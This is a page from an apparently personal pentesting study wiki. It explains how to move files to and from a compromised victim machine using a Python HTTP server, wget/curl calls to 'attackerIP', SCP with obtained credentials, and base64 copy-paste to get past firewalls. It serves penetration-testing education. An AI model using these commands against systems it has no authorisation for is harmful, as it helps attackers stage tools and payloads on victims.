The VX-Files
The VX-Files
  • README.txt
  • For updates, questions, suggestions or just chatting: @malcrvz
  • Download your own local copy or check my other libre projects: Github/malcrvz
  • 📕Cybersecurity Theory
    • Index
      • Malware types
        • Viruses, worms and Trojans
        • Backdoors, Rootkits and Spyware
        • Botnets, DDoS and Spammer
        • Ransomware
        • Scareware and Adware/PUP/PUA
        • Downloaders and Launchers
        • Hacktool
        • APT - Advanced Persistent Threat
      • Social engineering techniques
        • Phishing
        • Pretexting
        • Baiting
        • Quid pro quo
        • Tailgating
      • Cryptography
        • Hash functions
        • Symmetric, Asymmetric and Hybrid cryptography
        • Digital signatures & Digital certificates
        • TLS Protocol
      • Pentesting methodology & Techniques
        • CIA Triad - Confidentiality, Integrity & Availability
        • The methodology steps
        • Pre-Engagement
        • Information Gathering
          • HTTP status codes
          • robots.txt
        • Vulnerability Assessment
        • Exploitation
          • Password cracking
        • Post-Exploitation & Persistence
          • Types of Shells
        • Privilege Escalation & Lateral Movement
        • Reporting & Remediation
  • 🐧Linux Essentials
    • Index
      • 1, 0, bits, Bytes: Units of digital information
      • User management
      • Packet management
      • Privileges & sudo
      • Passwd & Shadow files
      • Managing files, links and regex
      • find
      • Terminal/TTY
      • SSH
  • 🪟Windows Essentials
    • Index
      • CLI user management
      • CMD File management
  • 🌍Networking Essentials
    • Index
      • Windows CLI IP management
      • Linux IP management
      • Linux CLI Wi-Fi connection
  • 🕸️Network Pentesting
    • Tools
      • 1. Pre-Engagement
        • OpenVPN
      • 2. Information gathering
        • cURL & wget
        • Nmap
        • arp
        • Netcat
        • whatweb
      • 3. Vulnerability assessment
        • smbclient
      • 4. Exploitation
        • Metasploit
        • Hashcat
        • John the Ripper
      • 5. Post-Exploitation & Persistence
        • SSH
      • 6. Privilege escalation & Lateral movement
        • Possible privilege escalation vectors - Auto-enumeration scripts
      • 7. Reporting & Remediation
    • Techniques
      • Upgrade reverse shell to interactive
      • Transferring files to/from remote victim
      • Possible privilege escalation vectors - Manual checklist
    • Resources
      • Manufacturer default passwords lists
        • IP Cameras
      • Get Shells
  • 💉Web App pentesting
    • Tools
      • CeWL
      • Gobuster
      • whatweb
    • Techniques
      • Command injection
    • Resources
      • Reverse Shells
      • Bind Shells
  • 📡Wireless pentesting
    • Tools
    • Techniques
    • Resources
  • 🔓On-Premises Pentesting
    • Tools
    • Techniques
      • Removing Linux user passwords
      • Removing Windows user passwords
    • Resources
  • 💽Disks & Forensics
    • Index
      • Getting a disk ready
      • Inodes & Sectors
      • Recover deleted files
      • BUILDING - Secure file deletion
  • 🕷️Bash scripts
    • coming soon
  • ⚡PowerShell Scripts
    • coming soon
  • 🟩HTB Walkthroughs
    • coming soon
  • 🏴‍☠️External Resources
    • Schools
    • Books & Wikis
    • Utilities
    • Interactive cheat sheets
    • Wordlists
Powered by GitBook
On this page
  • Using wget or cURL
  • Using SSH file transfer SCP
  • Using Base64
  1. Network Pentesting
  2. Techniques

Transferring files to/from remote victim

Once we compromised a system we could use different methods to transfer files to/from the victim depending on the situation.

Using wget or cURL

If the compromised victim has privileges enough to download files we could use wget or curl to copy a file from our own machine. First go into the directory that contains the file you want to transfer and run a simple Python HTTP server there with:

cd /transferDirectory
python3 -m http.server 8080         #8080 as an example port, use whatever

Now the server is listening on 8080 in our machine, download the file on the "compromised with code execution" victim with:

wget http://attackerIP:8080/file
or
curl http://attackerIP:8080/file -o newNameFile

Also could be vice-versa with the http server in the victim(if it has python installed) and the attacker downloading via wget/curl.

Using SSH file transfer SCP

Granted we obtained SSH credentials we could use SCP to transfer files from our attacking machine to the victim directly:

scp /local/dir/fileX user@IP:/remote/dir/fileX

Using Base64

If you are not able to transfer files directly, for example because the firewall protection prevents the victim to download files, you could use the base64 trick. Consists on encoding the file in base64 without line breaks (-w 0) so you can copy every detail from the file:

base64 fileX -w 0

And paste the result on the compromised machine with:

echo d2hhdCBhcmUgeW9 ... 1IGxvb2tpbmcgYXQg | base64 -d > fileX

To validate that the file transferred correctly we could check and compare the MD5 hash from the original file to the file pasted in the victim system:

md5sum fileX

Last updated 1 year ago

🕸️